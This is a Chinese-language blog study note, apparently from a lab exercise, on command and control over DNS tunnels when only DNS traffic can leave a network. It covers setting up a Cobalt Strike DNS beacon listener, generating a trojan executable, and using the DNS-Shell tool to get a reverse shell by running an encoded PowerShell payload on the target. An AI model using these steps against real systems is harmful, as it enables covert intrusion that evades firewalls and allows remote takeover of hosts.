您的位置:首页 > 科技 > 能源 > 8月16日笔记

8月16日笔记

2024/12/27 8:31:10 来源:https://blog.csdn.net/m0_74736832/article/details/141266171  浏览:    关键词:8月16日笔记

只有DNS协议出网场景

DNS 协议是一种请求、应答协议,也是一种可用于应用层的隧道技术。DNS 隧道的工作原理很简单,在进行 DNS 查询时,如果查询的域名不在 DNS 服务器本机缓存中,就会访问互联网进行查询,然后返回结果。如果在互联网上有一台定制的服务器,那么依靠 DNS 协议即可进行数据包的交互。
DNS隧道是一种网络通信技术,它利用域名系统(DNS)协议来传输非DNS数据。这种技术允许将其他类型的数据(如HTTP请求或其他网络协议的数据)封装在DNS请求和响应中,从而绕过防火墙或其他网络过滤机制,因为大多数网络都允许不受限制的DNS流量。通过这种方式,攻击者可以建立隐蔽通道来进行数据窃取、命令控制或渗透测试等活动,而不易被检测到。

CS开启监听DNS Beacon

创建监听器
QQ_1723794732633.png
生成木马
注意,这里生成木马类型得是 Windows Executable(S)
QQ_1723794891302.png
这里勾不勾选 x64 取决于目标主机的架构
QQ_1723794975655.png
只要木马在目标主机执行成功,我们的 CobaltStrike 就能接收到反弹的 shell。但
是默认情况下,主机信息是黑色的。我们需要执行以下命令,让目标主机信息显示出来

checkin
mode dns-txt

在beacon执行以上命令。

利用DNS进行命令控制

DNS-Shell 是一款通过 DNS 信道实现交互式 Shell 的强大工具,该工具的服务器端基于 Python 开发,可以任何一种安装了 Python 环境的操作系统平台上运行,工具所使用的 Payload 均已 PowerShell 命令进行编码,保证了在不同平台间运行的稳定性和兼容性。

下载DNS-Shell

git clone https://github.com/sensepost/DNS-Shell.git

QQ_1723796466434.png

DNS-Shell直接模式
python2 DNS-shell.py -l -d 192.168.5.138  #边缘服务器ip

发现dnslib库没安装。使用pip2 install dnslib又找不到包。
直接下载源码:

git clone https://github.com/paulc/dnslib.git

发现拒绝连接,应该是没代理(kali上);
代理教程:kali网络代理设置-CSDN博客
QQ_1723798958389.png
接收成功。

cd dnslib
python2 setup.py install

QQ_1723799047997.png
完成之后回到DNS-Shell的目录下。
在这里插入图片描述

生成一段payload,将这段payload复制下来。在目标机cmd窗口执行

powershell.exe -e 生成的payload

QQ_1723801977336.png
可以看到,我们已经成功接收到反弹回来的 shell 了。

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com